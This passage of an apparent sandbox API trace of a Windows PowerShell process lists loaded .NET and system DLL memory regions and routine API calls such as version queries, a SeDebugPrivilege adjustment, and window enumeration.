"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 3558 start_va = 0x71da0000 end_va = 0x71fd4fff entry_point = 0x71da0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 3559 start_va = 0x750d0000 end_va = 0x7511afff entry_point = 0x750d0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 3560 start_va = 0x75380000 end_va = 0x753a4fff entry_point = 0x75380000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 3764 start_va = 0x1f70000 end_va = 0x1f70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Region: id = 3765 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 3766 start_va = 0x74360000 end_va = 0x74422fff entry_point = 0x74360000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 3767 start_va = 0x74430000 end_va = 0x745cdfff entry_point = 0x74430000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 3768 start_va = 0x75070000 end_va = 0x7509cfff entry_point = 0x75070000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 3898 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 3899 start_va = 0x1f80000 end_va = 0x1f90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 3900 start_va = 0x2a90000 end_va = 0x2ae3fff entry_point = 0x2a90000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 3901 start_va = 0x71a40000 end_va = 0x71b53fff entry_point = 0x71a40000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 3902 start_va = 0x71b60000 end_va = 0x71c63fff entry_point = 0x71b60000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 3903 start_va = 0x73e20000 end_va = 0x74355fff entry_point = 0x73e20000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 3933 start_va = 0x2030000 end_va = 0x203ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 3934 start_va = 0x2040000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 3935 start_va = 0x2050000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 3936 start_va = 0x2770000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 3937 start_va = 0x2780000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 3938 start_va = 0x2790000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 3939 start_va = 0x27e0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 3940 start_va = 0x27f0000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 3941 start_va = 0x74650000 end_va = 0x74657fff entry_point = 0x74650000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3947 start_va = 0x4f20000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 4063 start_va = 0x2800000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 4064 start_va = 0x2810000 end_va = 0x2810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 4065 start_va = 0x4fa0000 end_va = 0x5271fff entry_point = 0x4fa0000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4066 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4067 start_va = 0x713e0000 end_va = 0x71a30fff entry_point = 0x713e0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 4068 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4069 start_va = 0x76450000 end_va = 0x76484fff entry_point = 0x76450000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4070 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4071 start_va = 0x77df0000 end_va = 0x77df5fff entry_point = 0x77df0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4084 start_va = 0x28c0000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 4085 start_va = 0x28d0000 end_va = 0x28d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028d0000" filename = "" Region: id = 4086 start_va = 0x745f0000 end_va = 0x7464afff entry_point = 0x745f0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 4089 start_va = 0x2920000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 4090 start_va = 0x2930000 end_va = 0x293ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 4091 start_va = 0x2940000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 4092 start_va = 0x5420000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 4093 start_va = 0x54d0000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x00000000054d0000" filename = "" Region: id = 4094 start_va = 0x74660000 end_va = 0x74664fff entry_point = 0x74660000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 4095 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 4097 start_va = 0x2990000 end_va = 0x2990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 4098 start_va = 0x52a0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 4099 start_va = 0x5360000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 4100 start_va = 0x5690000 end_va = 0x601ffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 4101 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3a0000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Region: id = 4102 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 4125 start_va = 0x29a0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 4126 start_va = 0x5510000 end_va = 0x560ffff entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 4128 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 112 os_tid = 0x358 [0129.638] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.388] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0130.388] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0130.388] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0130.388] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0133.385] GetVersionExW (in: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.385] GetLastError () returned 0x2 [0133.386] GetVersionExW (in: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.386] GetLastError () returned 0x2 [0133.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0133.393] GetLastError () returned 0x2 [0133.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e758, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0133.546] GetLastError () returned 0x2 [0133.546] GetVersionExW (in: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.546] GetLastError () returned 0x2 [0133.547] SetErrorMode (uMode=0x1) returned 0x1 [0133.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12ebd8 | out: lpFileInformation=0x12ebd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0133.548] GetLastError () returned 0x2 [0133.548] SetErrorMode (uMode=0x1) returned 0x1 [0133.551] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12ec5c | out: lpdwHandle=0x12ec5c) returned 0x94c [0133.553] GetLastError () returned 0x0 [0133.555] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b34d8c | out: lpData=0x2b34d8c) returned 1 [0133.562] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12ec28, puLen=0x12ec24 | out: lplpBuffer=0x12ec28*=0x2b34e28, puLen=0x12ec24) returned 1 [0133.564] lstrlenW (lpString="䅁") returned 1 [0133.587] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b34f04, puLen=0x12eba0) returned 1 [0133.588] lstrlenW (lpString="Microsoft Corporation") returned 21 [0133.589] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0133.589] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b34f58, puLen=0x12eba0) returned 1 [0133.589] lstrlenW (lpString="System.Management.Automation") returned 28 [0133.589] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0133.589] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b34fb4, puLen=0x12eba0) returned 1 [0133.589] lstrlenW (lpString="6.1.7601.17514") returned 14 [0133.589] lstrcpyW (in: lpString1=0x509ca8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0133.589] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b34ff4, puLen=0x12eba0) returned 1 [0133.589] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0133.589] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0133.589] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b3505c, puLen=0x12eba0) returned 1 [0133.589] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0133.589] lstrcpyW (in: lpString1=0x509ca8, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0133.589] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b350f8, puLen=0x12eba0) returned 1 [0133.589] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0133.590] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b3515c, puLen=0x12eba0) returned 1 [0133.590] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0133.590] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b351d8, puLen=0x12eba0) returned 1 [0133.590] lstrlenW (lpString="6.1.7601.17514") returned 14 [0133.590] lstrcpyW (in: lpString1=0x509ca8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x2b34e80, puLen=0x12eba0) returned 1 [0133.590] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0133.590] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x0, puLen=0x12eba0) returned 0 [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x0, puLen=0x12eba0) returned 0 [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12eba4, puLen=0x12eba0 | out: lplpBuffer=0x12eba4*=0x0, puLen=0x12eba0) returned 0 [0133.590] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12eb98, puLen=0x12eb94 | out: lplpBuffer=0x12eb98*=0x2b34e28, puLen=0x12eb94) returned 1 [0133.591] VerLanguageNameW (in: wLang=0x0, szLang=0x509ca8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0133.592] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\", lplpBuffer=0x12ebac, puLen=0x12eba8 | out: lplpBuffer=0x12ebac*=0x2b34db4, puLen=0x12eba8) returned 1 [0133.609] GetCurrentProcessId () returned 0x5a8 [0133.814] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12e3e4 | out: lpLuid=0x12e3e4*(LowPart=0x14, HighPart=0)) returned 1 [0133.816] GetLastError () returned 0x0 [0133.817] GetCurrentProcess () returned 0xffffffff [0133.817] GetLastError () returned 0x0 [0133.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x12e3e0 | out: TokenHandle=0x12e3e0*=0x310) returned 1 [0133.819] GetLastError () returned 0x0 [0133.915] AdjustTokenPrivileges (in: TokenHandle=0x310, DisableAllPrivileges=0, NewState=0x2b378cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0133.915] GetLastError () returned 0x514 [0133.917] CloseHandle (hObject=0x310) returned 1 [0133.917] GetLastError () returned 0x514 [0134.042] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x310 [0134.042] GetLastError () returned 0x514 [0134.053] EnumProcessModules (in: hProcess=0x310, lphModule=0x2b37910, cb=0x100, lpcbNeeded=0x12ebd4 | out: lphModule=0x2b37910, lpcbNeeded=0x12ebd4) returned 1 [0134.054] GetLastError () returned 0x514 [0134.179] GetModuleInformation (in: hProcess=0x310, hModule=0x21fb0000, lpmodinfo=0x2b37a50, cb=0xc | out: lpmodinfo=0x2b37a50*(lpBaseOfDll=0x21fb0000, SizeOfImage=0x72000, EntryPoint=0x21fb7363)) returned 1 [0134.180] GetLastError () returned 0x514 [0134.182] GetModuleBaseNameW (in: hProcess=0x310, hModule=0x21fb0000, lpBaseName=0x50a468, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0134.182] GetLastError () returned 0x514 [0134.183] GetModuleFileNameExW (in: hProcess=0x310, hModule=0x21fb0000, lpFilename=0x50a468, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0134.183] GetLastError () returned 0x514 [0134.184] CloseHandle (hObject=0x310) returned 1 [0134.184] GetLastError () returned 0x514 [0134.205] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x5a8) returned 0x310 [0134.205] GetLastError () returned 0x514 [0134.206] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x2b36f00 | out: lpExitCode=0x2b36f00*=0x103) returned 1 [0134.206] GetLastError () returned 0x514 [0134.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3b35278, Length=0x20000, ResultLength=0x12ec1c | out: SystemInformation=0x3b35278, ResultLength=0x12ec1c*=0xaaa8) returned 0x0 [0134.359] EnumWindows (lpEnumFunc=0x2af3612, lParam=0x0) returned 1 [0134.361] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6d4 [0134.361] GetLastError () returned 0x514 [0134.361] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x32c [0134.361] GetLastError () returned 0x514 [0134.361] GetWindowThreadProcessId (in: hWnd=0x200cc, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.361] GetLastError () returned 0x514 [0134.361] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.361] GetLastError () returned 0x514 [0134.361] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.361] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.362] GetLastError () returned 0x514 [0134.362] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: 